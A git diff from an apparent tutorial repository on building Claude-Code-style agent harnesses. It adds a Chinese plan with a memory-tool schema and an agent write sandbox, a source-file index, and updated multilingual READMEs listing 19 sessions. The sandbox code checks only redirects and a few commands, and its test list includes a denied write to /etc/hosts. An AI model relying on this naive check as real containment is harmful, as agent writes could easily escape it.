+            "description": "Persist one piece of cross-session knowledge.",
+            "input_schema": {
+                "type": "object",
+                "properties": {
+                    "name": {"type": "string"},
+                    "type": {"type": "string", "enum": list(MEMORY_TYPES)},
+                    "description": {"type": "string"},
+                    "content": {"type": "string"},
+                },
+                "required": ["name", "type", "description", "content"],
+            },
+        }
+```
+
+#### Try It 实验内容
+
+```
+1. "我是前端开发,偏好 TypeScript 和 React" → 提取 user 记忆
+2. "不要用 mock,测试必须连接真实数据库" → 提取 feedback 记忆
+3. "这个项目的认证中间件因合规要求重写" → 提取 project 记忆
+4. /memory → 查看所有跨会话记忆
+5. (新对话) "我之前说过什么偏好?" 
→ 从记忆中加载回答
+```
+
+---
+
+### 【模块 O】s23: Sandbox Isolation (沙箱隔离)
+
+**文件**: `agents/s23_sandbox_isolation.py`
+**预计行数**: ~250 行
+**依赖**: s13
+
+#### 核心类
+
+```python
+from pathlib import Path
+
+class SandboxManager:
+    """文件系统级沙箱:限制 agent 只能在白名单路径内写文件"""
+
+    def __init__(self, allowed_paths: list[Path] = None):
+        self._allowed = set()
+        self._enabled = True
+        # 默认允许当前工作目录
+        cwd = Path.cwd().resolve()
+        self._allowed.add(cwd)
+        # 允许临时目录
+        tmp = Path("/tmp/learn-claude-code")
+        tmp.mkdir(exist_ok=True)
+        self._allowed.add(tmp)
+        # 用户自定义路径
+        if allowed_paths:
+            for p in allowed_paths:
+                self._allowed.add(Path(p).resolve())
+
+    def enable(self):
+        self._enabled = True
+
+    def disable(self):
+        self._enabled = False
+
+    def add_path(self, path: str | Path):
+        self._allowed.add(Path(path).resolve())
+
+    def is_write_allowed(self, target_path: str) -> tuple[bool, str]:
+        """检查目标路径是否在白名单内(含白名单目录的子目录)"""
+        if not self._enabled:
+            return True, "Sandbox disabled"
+
+        resolved = Path(target_path).resolve()
+
+        for allowed in self._allowed:
+            try:
+                resolved.relative_to(allowed)
+                return True, f"Path within {allowed}"
+            except ValueError:
+                continue
+
+        # 未命中任何白名单路径
+        return False, f"Path outside sandbox: {resolved} not in allowed paths"
+
+    def check_command(self, command: str) -> tuple[bool, str]:
+        """从命令中提取写路径并检查"""
+        import re
+        # 提取重定向目标(>> 追加也要匹配,否则可被绕过)
+        redirect_match = re.search(r'>>?\s*(\S+)', command)
+        if redirect_match:
+            return self.is_write_allowed(redirect_match.group(1))
+
+        # 提取常见写命令的目标
+        tokens = command.split()
+        if not tokens:
+            return True, "Empty command"
+
+        base = tokens[0]
+        if base in ("mkdir", "touch", "cp", "mv"):
+            # 最后一个非 flag 参数通常是目标
+            targets = [t for t in tokens[1:] if not t.startswith("-")]
+            if targets:
+                return self.is_write_allowed(targets[-1])
+
+        return True, "No write path detected"
+
+
+# 集成到 s13 的 PermissionGuard
+class PermissionGuard:
+    def __init__(self, sandbox: SandboxManager = None):
+        self.sandbox = sandbox or SandboxManager()
+
+    def check(self, 
command: str) -> PermissionResult: + # ... s13 的权限检查 ... + + # 额外:沙箱写路径检查 + if self.sandbox: + allowed, reason = self.sandbox.check_command(command) + if not allowed: + return PermissionResult("deny", False, command, f"Sandbox: {reason}") + + # ... 继续正常检查 ... +``` + +#### Try It 实验内容 + +``` +1. "在当前目录创建 test.txt" → 沙箱允许(cwd 在白名单内) +2. "写入 /etc/hosts 文件" → 沙箱拒绝(/etc/ 不在白名单) +3. "echo hello > /tmp/learn-claude-code/output.txt" → 沙箱允许(临时目录在白名单) +4. /sandbox status → 查看当前沙箱白名单 +5. /sandbox add /Users/me/projects → 添加额外允许路径 +``` + +--- + +--- + +## 附录:源码分析详细索引 + +以下是对 `/Users/yanghaoran/Code/claude-code/src/` 的分析索引,供开发 Phase 6 时参考: + +| 子系统 | 源码路径 | 关键文件 | 对应章节 | +|--------|---------|---------|---------| +| **Hooks** | `src/utils/hooks.ts` + `src/hooks/` + `src/services/tools/toolHooks.ts` | `hooks.ts` (~36000 tokens), `toolHooks.ts` | s15 | +| **MCP** | `src/services/mcp/` | `client.ts`, `MCPConnectionManager.tsx`, `types.ts`, `config.ts`, `auth.ts` | s16 | +| **Session Memory** | `src/services/SessionMemory/` | `sessionMemory.ts`, `prompts.ts`, `sessionMemoryUtils.ts` | s18 | +| **Auto Mode** | `src/utils/permissions/yoloClassifier.ts` | 52KB prompt, 两阶段分类器 | s19 | +| **Bash Security** | `src/tools/BashTool/bashSecurity.ts` + `readOnlyValidation.ts` | 2000+ 行安全检查 | s20 | +| **Plugins** | `src/plugins/` + `src/services/plugins/` | `builtinPlugins.ts`, `PluginInstallationManager.ts` | s21 | +| **Compact** | `src/services/compact/` | `compact.ts`, `autoCompact.ts`, `microCompact.ts`, `grouping.ts` | s06/s18 | +| **Memory Extract** | `src/services/extractMemories/` | `extractMemories.ts`, `prompts.ts` | s22 | +| **Memdir** | `src/memdir/` | 记忆目录管理、老化、相关性评分 | s22 | +| **Permission** | `src/utils/permissions/` | `permissions.ts`, `pathValidation.ts`, `bashClassifier.ts` | s13/s20/s23 | +| **Sandbox** | `src/utils/bash/sandbox-adapter.ts` + `utils/permissions/pathValidation.ts` | 沙箱白名单 + denyWrite | s23 | +| **Skills** | `src/skills/` | `bundledSkills.ts`, 
`loadSkillsDir.ts`, `mcpSkills.ts` | s05/s21 | +| **Coordinator** | `src/coordinator/coordinatorMode.ts` | ~19000 tokens | (未覆盖) | +| **LSP** | `src/services/lsp/` | `LSPServerManager.ts`, `LSPClient.ts` | (未覆盖) | +| **Remote** | `src/remote/` | `RemoteSessionManager.ts`, `SessionsWebSocket.ts` | (未覆盖) | +| **Voice** | `src/services/voice/` | `voice.ts`, `voiceStreamSTT.ts` | (未覆盖) | +| **Vim** | `src/vim/` | 完整 vim 模拟 | (未覆盖) | diff --git a/README-ja.md b/README-ja.md index b033a5f3b..e3b8b5ab8 100644 --- a/README-ja.md +++ b/README-ja.md @@ -106,7 +106,7 @@ Claude Code = 一つの agent loop これがすべてだ。これが全アーキテクチャ。すべてのコンポーネントは Harness メカニズム -- Agent が住む世界の一部。Agent そのものは? Claude だ。モデル。Anthropic が人類の推論とコードの全幅で訓練した。Harness が Claude を賢くしたのではない。Claude は元々賢い。Harness が Claude に手と目とワークスペースを与えた。 -これが Claude Code が理想的な教材である理由だ:**モデルを信頼し、工学的努力を Harness に集中させるとどうなるかを示している。** このリポジトリの各セッション(s01-s12)は Claude Code アーキテクチャから一つの Harness メカニズムをリバースエンジニアリングする。終了時には、Claude Code の仕組みだけでなく、あらゆるドメインのあらゆる Agent に適用される Harness 工学の普遍的原則を理解している。 +これが Claude Code が理想的な教材である理由だ:**モデルを信頼し、工学的努力を Harness に集中させるとどうなるかを示している。** このリポジトリの各セッション(s01-s19)は Claude Code アーキテクチャから一つの Harness メカニズムをリバースエンジニアリングする。終了時には、Claude Code の仕組みだけでなく、あらゆるドメインのあらゆる Agent に適用される Harness 工学の普遍的原則を理解している。 教訓は「Claude Code をコピーせよ」ではない。教訓は:**最高の Agent プロダクトは、自分の仕事が Harness であって Intelligence ではないと理解しているエンジニアが作る。** @@ -159,32 +159,46 @@ Claude Code = 一つの agent loop Agent を特定ドメインで効果的にする Harness -- の作り方を教える。 ``` -**12 の段階的セッション、シンプルなループから分離された自律実行まで。** +**19 の段階的セッション、シンプルなループから外付けプラグインまで。** **各セッションは 1 つの Harness メカニズムを追加する。各メカニズムには 1 つのモットーがある。** > **s01**   *"One loop & Bash is all you need"* — 1つのツール + 1つのループ = エージェント > > **s02**   *"ツールを足すなら、ハンドラーを1つ足すだけ"* — ループは変わらない。新ツールは dispatch map に登録するだけ > -> **s03**   *"計画のないエージェントは行き当たりばったり"* — まずステップを書き出し、それから実行 +> **s03**   *"まず境界を決め、それから自由を与える"* — 権限パイプラインが承認の要否を判断する > -> **s04**   *"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを"* — サブエージェントは独立した messages[] を使い、メイン会話を汚さない +> **s04**   
*"ループの外にフックし、ループは書き換えない"* — フックがツール実行前後に拡張ロジックを注入 > -> **s05**   *"必要な知識を、必要な時に読み込む"* — system prompt ではなく tool_result で注入 +> **s05**   *"計画のないエージェントは行き当たりばったり"* — まずステップを書き出し、それから実行 > -> **s06**   *"コンテキストはいつか溢れる、空ける手段が要る"* — 3層圧縮で無限セッションを実現 +> **s06**   *"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを"* — サブエージェントは独立した messages[] を使い、メイン会話を汚さない > -> **s07**   *"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する"* — ファイルベースのタスクグラフ、マルチエージェント協調の基盤 +> **s07**   *"必要な知識を、必要な時に読み込む"* — system prompt ではなく tool_result で注入 > -> **s08**   *"遅い操作はバックグラウンドへ、エージェントは次を考え続ける"* — デーモンスレッドがコマンド実行、完了後に通知を注入 +> **s08**   *"コンテキストはいつか溢れる、空ける手段が要る"* — 4層圧縮、安い方から先に実行 > -> **s09**   *"一人で終わらないなら、チームメイトに任せる"* — 永続チームメイト + 非同期メールボックス +> **s09**   *"覚えるべきことを覚え、忘れるべきことを忘れる"* — 3つのサブシステム:選択、抽出、整理 > -> **s10**   *"チームメイト間には統一の通信ルールが必要"* — 1つの request-response パターンが全交渉を駆動 +> **s10**   *"プロンプトは実行時に組み立てる、ハードコードではない"* — セクション分割 + オンデマンド連結 > -> **s11**   *"チームメイトが自らボードを見て、仕事を取る"* — リーダーが逐一割り振る必要はない +> **s11**   *"エラーは終わりではない、リトライの始まりだ"* — トークン拡張、コンテキスト圧縮、モデル切替 > -> **s12**   *"各自のディレクトリで作業し、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け +> **s12**   *"大きな目標を小タスクに分解し、順序付けし、ディスクに記録する"* — ファイルベースのタスクグラフ、マルチエージェント協調の基盤 +> +> **s13**   *"遅い操作はバックグラウンドへ、エージェントは次を考え続ける"* — バックグラウンドスレッドがコマンド実行、完了後に通知を注入 +> +> **s14**   *"スケジュールで発火、人間の起動は不要"* — cron スケジューリング、永続 or セッション限定 +> +> **s15**   *"一人で終わらないなら、チームメイトに任せる"* — 永続チームメイト + 非同期メールボックス +> +> **s16**   *"チームメイト間には統一の通信ルールが必要"* — 1つの request-response パターンが全交渉を駆動 +> +> **s17**   *"チームメイトが自らボードを見て、仕事を取る"* — リーダーが逐一割り振る必要はない +> +> **s18**   *"各自のディレクトリで作業し、互いに干渉しない"* — タスクは目標を管理、worktree はディレクトリを管理、IDで紐付け +> +> **s19**   *"能力不足? 
MCP でプラグイン"* — マルチトランスポート、チャネルルーティング、ツールプール統合 --- @@ -238,9 +252,9 @@ cd learn-claude-code pip install -r requirements.txt cp .env.example .env # .env を編集して ANTHROPIC_API_KEY を入力 -python agents/s01_agent_loop.py # ここから開始 -python agents/s12_worktree_task_isolation.py # 全セッションの到達点 -python agents/s_full.py # 総括: 全メカニズム統合 +python s01_agent_loop/code.py # ここから開始 — 1ループ + bash +python s08_context_compact/code.py # コンテキスト圧縮(最複雑章) +python s_full/code.py # 総括: 全19メカニズム統合 ``` ### Web プラットフォーム @@ -251,75 +265,71 @@ python agents/s_full.py # 総括: 全メカニズム統合 cd web && npm install && npm run dev # http://localhost:3000 ``` -## 学習パス - -``` -フェーズ1: ループ フェーズ2: 計画と知識 -================== ============================== -s01 エージェントループ [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag リマインダー - | | - +-> s02 Tool Use [4] s04 サブエージェント [5] - dispatch map: name->handler 子ごとに新しい messages[] - | - s05 Skills [5] - SKILL.md を tool_result で注入 - | - s06 Context Compact [5] - 3層コンテキスト圧縮 - -フェーズ3: 永続化 フェーズ4: チーム -================== ===================== -s07 タスクシステム [8] s09 エージェントチーム [9] - ファイルベース CRUD + 依存グラフ チームメイト + JSONL メールボックス - | | -s08 バックグラウンドタスク [6] s10 チームプロトコル [12] - デーモンスレッド + 通知キュー シャットダウン + プラン承認 FSM - | - s11 自律エージェント [14] - アイドルサイクル + 自動クレーム - | - s12 Worktree 分離 [16] - タスク調整 + 必要時の分離実行レーン - - [N] = ツール数 -``` +## 5つの段階 + +| 段階 | セッション | 構築するもの | +|---|---|---| +| **ツールパイプライン** | `s01-s04` | loop → dispatch → permission → hooks | +| **シングルエージェント機能** | `s05-s08` | planning → subagent → skill → context compact | +| **知識と回復力** | `s09-s11` | memory → prompt assembly → error recovery | +| **永続的作業** | `s12-s14` | task graph → background → cron | +| **マルチエージェント基盤** | `s15-s19` | teams → protocols → autonomy → worktree → MCP | + +## 全セッション + +| セッション | トピック | キーコンセプト | +|---|---|---| +| [s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / 並行性 | +| [s03](./s03_permission/) | 
Permission | `PermissionRule` / 承認パイプライン | +| [s04](./s04_hooks/) | Hooks | `PreToolUse` / `PostToolUse` / 拡張ポイント | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / 計画してから実行 | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / コンテキスト分離 | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / オンデマンド注入 | +| [s08](./s08_context_compact/) | Context Compact | snip / micro / budget / auto 4層圧縮 | +| [s09](./s09_memory/) | Memory | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | ランタイム組立 / セクション連結 | +| [s11](./s11_error_recovery/) | Error Recovery | token 拡張 / fallback モデル / リトライ戦略 | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / ディスク永続化 | +| [s13](./s13_background_tasks/) | Background Tasks | スレッド実行 / 通知キュー | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | 永続スケジューリング / セッション限定トリガー | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / 受信箱 / 権限バブリング | +| [s16](./s16_team_protocols/) | Team Protocols | シャットダウンハンドシェイク / プラン承認 | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | アイドルサイクル / 自動クレーム | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / タスク-ディレクトリ紐付け | +| [s19](./s19_mcp_plugin/) | MCP Plugin | マルチトランスポート / チャネルルーティング / ツールプール統合 | +| [s_full](./s_full/) | 総括 | s01-s19 全メカニズム統合 | ## プロジェクト構成 ``` learn-claude-code/ -| -|-- agents/ # Python リファレンス実装 (s01-s12 + s_full 総括) -|-- docs/{en,zh,ja}/ # メンタルモデル優先のドキュメント (3言語) -|-- web/ # インタラクティブ学習プラットフォーム (Next.js) -|-- skills/ # s05 の Skill ファイル -+-- .github/workflows/ci.yml # CI: 型チェック + ビルド + s01_agent_loop/ # セッションごとに1フォルダ + README.md # 中国語ソース(完全なナラティブ) + README.en.md # 英語訳 + README.ja.md # 日本語訳 + code.py # 単体実行可能なコード + images/ # SVG ダイアグラム + s02_tool_use/ + ... 
+ s19_mcp_plugin/
+ s_full/ # 総括
+ agents/ # フラットコピー、python agents/sXX.py でクイック実行
+ skills/ # s07 で使用するスキルファイル
+ docs/ # 旧バージョン(アーカイブ)
+ web/ # Web 学習プラットフォーム
+ tests/
+
 ```
+
 
-## ドキュメント
-
-メンタルモデル優先: 問題、解決策、ASCII図、最小限のコード。
-[English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/)
-
-| セッション | トピック | モットー |
-|-----------|---------|---------|
-| [s01](./docs/ja/s01-the-agent-loop.md) | エージェントループ | *One loop & Bash is all you need* |
-| [s02](./docs/ja/s02-tool-use.md) | Tool Use | *ツールを足すなら、ハンドラーを1つ足すだけ* |
-| [s03](./docs/ja/s03-todo-write.md) | TodoWrite | *計画のないエージェントは行き当たりばったり* |
-| [s04](./docs/ja/s04-subagent.md) | サブエージェント | *大きなタスクを分割し、各サブタスクにクリーンなコンテキストを* |
-| [s05](./docs/ja/s05-skill-loading.md) | Skills | *必要な知識を、必要な時に読み込む* |
-| [s06](./docs/ja/s06-context-compact.md) | Context Compact | *コンテキストはいつか溢れる、空ける手段が要る* |
-| [s07](./docs/ja/s07-task-system.md) | タスクシステム | *大きな目標を小タスクに分解し、順序付けし、ディスクに記録する* |
-| [s08](./docs/ja/s08-background-tasks.md) | バックグラウンドタスク | *遅い操作はバックグラウンドへ、エージェントは次を考え続ける* |
-| [s09](./docs/ja/s09-agent-teams.md) | エージェントチーム | *一人で終わらないなら、チームメイトに任せる* |
-| [s10](./docs/ja/s10-team-protocols.md) | チームプロトコル | *チームメイト間には統一の通信ルールが必要* |
-| [s11](./docs/ja/s11-autonomous-agents.md) | 自律エージェント | *チームメイトが自らボードを見て、仕事を取る* |
-| [s12](./docs/ja/s12-worktree-task-isolation.md) | Worktree + タスク分離 | *各自のディレクトリで作業し、互いに干渉しない* |
 
 ## 次のステップ -- 理解から出荷へ
 
-12 セッションを終えれば、Harness 工学の内部構造を完全に理解している。その知識を活かす 2 つの方法:
+19 セッションを終えれば、Harness 工学の内部構造を完全に理解している。その知識を活かす 2 つの方法:
 
 ### Kode Agent CLI -- オープンソース Coding Agent CLI
diff --git a/README-zh.md b/README-zh.md
index 9ed73ef30..df3033d69 100644
--- a/README-zh.md
+++ b/README-zh.md
@@ -106,7 +106,7 @@ Claude Code = 一个 agent loop
 
 就这些。这就是全部架构。每一个组件都是 harness 机制 -- 为 agent 构建的栖居世界的一部分。Agent 本身呢?是 Claude。一个模型。由 Anthropic 在人类推理和代码的全部广度上训练而成。Harness 没有让 Claude 变聪明。Claude 本来就聪明。Harness 给了 Claude 双手、双眼和一个工作空间。
 
-这就是 Claude Code 作为教学标本的意义:**它展示了当你信任模型、把工程精力集中在 harness 上时会发生什么。** 
本仓库的每一个课程(s01-s12)都在逆向工程 Claude Code 架构中的一个 harness 机制。学完之后,你理解的不只是 Claude Code 怎么工作,而是适用于任何领域、任何 agent 的 harness 工程通用原则。 +这就是 Claude Code 作为教学标本的意义:**它展示了当你信任模型、把工程精力集中在 harness 上时会发生什么。** 本仓库的每一个课程(s01-s19)都在逆向工程 Claude Code 架构中的一个 harness 机制。学完之后,你理解的不只是 Claude Code 怎么工作,而是适用于任何领域、任何 agent 的 harness 工程通用原则。 启示不是 "复制 Claude Code"。启示是:**最好的 agent 产品,出自那些明白自己的工作是 harness 而非 intelligence 的工程师之手。** @@ -159,32 +159,46 @@ Claude Code = 一个 agent loop 让 agent 在特定领域高效工作的 harness。 ``` -**12 个递进式课程, 从简单循环到隔离化的自治执行。** +**19 个递进式课程, 从简单循环到外接插件。** **每个课程添加一个 harness 机制。每个机制有一句格言。** > **s01**   *"One loop & Bash is all you need"* — 一个工具 + 一个循环 = 一个 Agent > > **s02**   *"加一个工具, 只加一个 handler"* — 循环不用动, 新工具注册进 dispatch map 就行 > -> **s03**   *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍 +> **s03**   *"先划边界, 再给自由"* — 权限管线决定哪些操作需要审批 > -> **s04**   *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话 +> **s04**   *"挂在循环上, 不写进循环里"* — 钩子在工具执行前后注入扩展逻辑 > -> **s05**   *"用到什么知识, 临时加载什么知识"* — 通过 tool_result 注入, 不塞 system prompt +> **s05**   *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍 > -> **s06**   *"上下文总会满, 要有办法腾地方"* — 三层压缩策略, 换来无限会话 +> **s06**   *"大任务拆小, 每个小任务干净的上下文"* — Subagent 用独立 messages[], 不污染主对话 > -> **s07**   *"大目标要拆成小任务, 排好序, 记在磁盘上"* — 文件持久化的任务图, 为多 agent 协作打基础 +> **s07**   *"用到时再加载, 别全塞 prompt 里"* — 通过 tool_result 注入, 不塞 system prompt > -> **s08**   *"慢操作丢后台, agent 继续想下一步"* — 后台线程跑命令, 完成后注入通知 +> **s08**   *"上下文总会满, 要有办法腾地方"* — 四层压缩策略, 便宜的先跑贵的后跑 > -> **s09**   *"任务太大一个人干不完, 要能分给队友"* — 持久化队友 + 异步邮箱 +> **s09**   *"记住该记的, 忘掉该忘的"* — 三个子系统: 筛选、提取、整理 > -> **s10**   *"队友之间要有统一的沟通规矩"* — 一个 request-response 模式驱动所有协商 +> **s10**   *"prompt 是组装出来的, 不是写死的"* — 分段 + 按需拼接 > -> **s11**   *"队友自己看看板, 有活就认领"* — 不需要领导逐个分配, 自组织 +> **s11**   *"错误不是终点, 是重试的起点"* — 升级 token、压缩上下文、切换模型 > -> **s12**   *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定 +> **s12**   *"大目标拆成小任务, 排好序, 持久化"* — 文件持久化的任务图, 多 agent 协作的基础 +> +> **s13**   *"慢操作丢后台, agent 继续思考"* — 后台线程跑命令, 完成后注入通知 +> +> **s14**   *"定时触发, 不需要人推"* — cron 调度, 持久化或会话级 
+> +> **s15**   *"一个搞不定, 组队来"* — 持久化队友 + 异步邮箱 +> +> **s16**   *"队友之间要有约定"* — 一个 request-response 模式驱动所有协商 +> +> **s17**   *"队友自己看板, 有活就认领"* — 不需要领导逐个分配, 自组织 +> +> **s18**   *"各干各的目录, 互不干扰"* — 任务管目标, worktree 管目录, 按 ID 绑定 +> +> **s19**   *"能力不够? 插上 MCP"* — 多传输、通道路由、工具池合并 --- @@ -238,9 +252,9 @@ cd learn-claude-code pip install -r requirements.txt cp .env.example .env # 编辑 .env 填入你的 ANTHROPIC_API_KEY -python agents/s01_agent_loop.py # 从这里开始 -python agents/s12_worktree_task_isolation.py # 完整递进终点 -python agents/s_full.py # 总纲: 全部机制合一 +python s01_agent_loop/code.py # 起点 — 一个循环 + bash +python s08_context_compact/code.py # 上下文压缩(最复杂章) +python s_full/code.py # 总纲: 全部 19 个机制合一 ``` ### Web 平台 @@ -251,75 +265,64 @@ python agents/s_full.py # 总纲: 全部机制合一 cd web && npm install && npm run dev # http://localhost:3000 ``` -## 学习路径 - -``` -第一阶段: 循环 第二阶段: 规划与知识 -================== ============================== -s01 Agent Loop [1] s03 TodoWrite [5] - while + stop_reason TodoManager + nag 提醒 - | | - +-> s02 Tool Use [4] s04 Subagent [5] - dispatch map: name->handler 每个 Subagent 独立 messages[] - | - s05 Skills [5] - SKILL.md 通过 tool_result 注入 - | - s06 Context Compact [5] - 三层 Context Compact - -第三阶段: 持久化 第四阶段: 团队 -================== ===================== -s07 Task System [8] s09 Agent Teams [9] - 文件持久化 CRUD + 依赖图 队友 + JSONL 邮箱 - | | -s08 Background Tasks [6] s10 Team Protocols [12] - 守护线程 + 通知队列 关机 + 计划审批 FSM - | - s11 Autonomous Agents [14] - 空闲轮询 + 自动认领 - | - s12 Worktree Isolation [16] - Task 协调 + 按需隔离执行通道 - - [N] = 工具数量 -``` +## 五个阶段 + +| 阶段 | 章节 | 你在构建什么 | +|---|---|---| +| **工具管线** | `s01-s04` | loop → dispatch → permission → hooks | +| **单 Agent 能力** | `s05-s08` | planning → subagent → skill → context compact | +| **知识与韧性** | `s09-s11` | memory → prompt assembly → error recovery | +| **持久化工作** | `s12-s14` | task graph → background → cron | +| **多 Agent 平台** | `s15-s19` | teams → protocols → autonomy → worktree → MCP | + +## 全部章节 + +| 章节 | 主题 | 关键概念 | +|---|---|---| +| 
[s01](./s01_agent_loop/) | Agent Loop | `messages` / `while True` / `stop_reason` | +| [s02](./s02_tool_use/) | Tool Use | `TOOL_HANDLERS` / dispatch map / 并发 | +| [s03](./s03_permission/) | Permission | `PermissionRule` / 审批管线 | +| [s04](./s04_hooks/) | Hooks | `PreToolUse` / `PostToolUse` / 扩展点 | +| [s05](./s05_todo_write/) | TodoWrite | `TodoItem` / 先计划后执行 | +| [s06](./s06_subagent/) | Subagent | `fresh messages[]` / 上下文隔离 | +| [s07](./s07_skill_loading/) | Skill Loading | `SkillManifest` / 按需注入 | +| [s08](./s08_context_compact/) | Context Compact | snip / micro / budget / auto 四层压缩 | +| [s09](./s09_memory/) | Memory | selection / extraction / consolidation | +| [s10](./s10_system_prompt/) | System Prompt | 运行时组装 / 分段拼接 | +| [s11](./s11_error_recovery/) | Error Recovery | token 升级 / fallback 模型 / 重试策略 | +| [s12](./s12_task_system/) | Task System | `TaskRecord` / `blockedBy` / 磁盘持久化 | +| [s13](./s13_background_tasks/) | Background Tasks | 线程执行 / 通知队列 | +| [s14](./s14_cron_scheduler/) | Cron Scheduler | 持久化调度 / 会话级触发 | +| [s15](./s15_agent_teams/) | Agent Teams | `MessageBus` / 收件箱 / 权限冒泡 | +| [s16](./s16_team_protocols/) | Team Protocols | 关机握手 / 计划审批 | +| [s17](./s17_autonomous_agents/) | Autonomous Agents | 空闲循环 / 自动认领 | +| [s18](./s18_worktree_isolation/) | Worktree Isolation | `WorktreeRecord` / 任务-目录绑定 | +| [s19](./s19_mcp_plugin/) | MCP Plugin | 多传输 / 通道路由 / 工具池合并 | +| [s_full](./s_full/) | 总纲 | s01-s19 全部机制合并 | ## 项目结构 ``` learn-claude-code/ -| -|-- agents/ # Python 参考实现 (s01-s12 + s_full 总纲) -|-- docs/{en,zh,ja}/ # 心智模型优先的文档 (3 种语言) -|-- web/ # 交互式学习平台 (Next.js) -|-- skills/ # s05 的 Skill 文件 -+-- .github/workflows/ci.yml # CI: 类型检查 + 构建 -``` - -## 文档 - -心智模型优先: 问题、方案、ASCII 图、最小化代码。 -[English](./docs/en/) | [中文](./docs/zh/) | [日本語](./docs/ja/) - -| 课程 | 主题 | 格言 | -|------|------|------| -| [s01](./docs/zh/s01-the-agent-loop.md) | Agent Loop | *One loop & Bash is all you need* | -| [s02](./docs/zh/s02-tool-use.md) | Tool Use | *加一个工具, 只加一个 handler* | -| 
[s03](./docs/zh/s03-todo-write.md) | TodoWrite | *没有计划的 agent 走哪算哪* | -| [s04](./docs/zh/s04-subagent.md) | Subagent | *大任务拆小, 每个小任务干净的上下文* | -| [s05](./docs/zh/s05-skill-loading.md) | Skills | *用到什么知识, 临时加载什么知识* | -| [s06](./docs/zh/s06-context-compact.md) | Context Compact | *上下文总会满, 要有办法腾地方* | -| [s07](./docs/zh/s07-task-system.md) | Task System | *大目标要拆成小任务, 排好序, 记在磁盘上* | -| [s08](./docs/zh/s08-background-tasks.md) | Background Tasks | *慢操作丢后台, agent 继续想下一步* | -| [s09](./docs/zh/s09-agent-teams.md) | Agent Teams | *任务太大一个人干不完, 要能分给队友* | -| [s10](./docs/zh/s10-team-protocols.md) | Team Protocols | *队友之间要有统一的沟通规矩* | -| [s11](./docs/zh/s11-autonomous-agents.md) | Autonomous Agents | *队友自己看看板, 有活就认领* | -| [s12](./docs/zh/s12-worktree-task-isolation.md) | Worktree + Task Isolation | *各干各的目录, 互不干扰* | + s01_agent_loop/ # 每章一个文件夹 + README.md # 中文源文档(完整叙事) + README.en.md # 英文译本 + README.ja.md # 日文译本 + code.py # 独立可运行代码 + images/ # SVG 流程图 + s02_tool_use/ + ... + s19_mcp_plugin/ + s_full/ # 总纲 + agents/ # 扁平副本,方便 python agents/sXX.py 快速运行 + skills/ # s07 使用的 skill 文件 + docs/ # 旧版线上文档(已归档) + web/ # Web 教学平台 + tests/ ## 学完之后 -- 从理解到落地 -12 个课程走完, 你已经从内到外理解了 harness 工程的运作原理。两种方式把知识变成产品: +19 个课程走完, 你已经从内到外理解了 harness 工程的运作原理。两种方式把知识变成产品: ### Kode Agent CLI -- 开源 Coding Agent CLI diff --git a/README.md b/README.md index 5d31cf7d1..c3a9e0996 100644 --- a/README.md +++ b/README.md @@ -1,53 +1,52 @@ [English](./README.md) | [中文](./README-zh.md) | [日本語](./README-ja.md) + # Learn Claude Code -- Harness Engineering for Real Agents ## Agency Comes from the Model. An Agent Product = Model + Harness. -Before we talk about code, let's get one thing straight. +Before we write any code, one thing needs to be clear. -**Agency -- the ability to perceive, reason, and act -- comes from model training, not from external code orchestration.** But a working agent product needs both the model and the harness. The model is the driver, the harness is the vehicle. 
This repo teaches you how to build the vehicle. +**Agency -- the capacity to perceive, reason, and act -- comes from model training, not from external code orchestration.** But a working agent product needs both the model and the harness. The model is the driver. The harness is the vehicle. This repository teaches you how to build the vehicle. ### Where Agency Comes From -At the core of every agent is a neural network -- a Transformer, an RNN, a learned function -- that has been trained, through billions of gradient updates on action-sequence data, to perceive an environment, reason about goals, and take actions. Agency is never granted by the surrounding code. It is learned by the model during training. +At the core of every agent is a neural network -- a Transformer, an RNN, a trained function -- shaped by billions of gradient updates on sequences of perception, reasoning, and action. Agency was never bestowed by the surrounding code. It was learned during training. -Humans are the best example. A biological neural network shaped by millions of years of evolutionary training, perceiving the world through senses, reasoning through a brain, acting through a body. When DeepMind, OpenAI, or Anthropic say "agent," the core of what they mean is always the same thing: **a model that has learned to act, plus the infrastructure that lets it operate in a specific environment.** +Humans are the original proof. A biological neural network, refined by millions of years of evolutionary pressure, perceives the world through senses, reasons through a brain, and acts through a body. 
When DeepMind, OpenAI, or Anthropic say "agent," they all mean the same core thing: **a model that learned to act through training, plus the infrastructure that lets it operate in a specific environment.**

-The proof is written in history:
+The historical record is unambiguous:

-- **2013 -- DeepMind DQN plays Atari.** A single neural network, receiving only raw pixels and game scores, learned to play 7 Atari 2600 games -- surpassing all prior algorithms and beating human experts on 3 of them. By 2015, the same architecture scaled to [49 games and matched professional human testers](https://www.nature.com/articles/nature14236), published in *Nature*. No game-specific rules. No decision trees. One model, learning from experience. That model was the agent.
+- **2013 -- DeepMind DQN plays Atari.** A single neural network, receiving only raw pixels and game scores, learned 7 Atari 2600 games -- surpassing prior algorithms and beating human experts on 3 of them. By 2015, it scaled to [49 games at professional tester level](https://www.nature.com/articles/nature14236), published in *Nature*. No game-specific rules. One model, learning from experience.

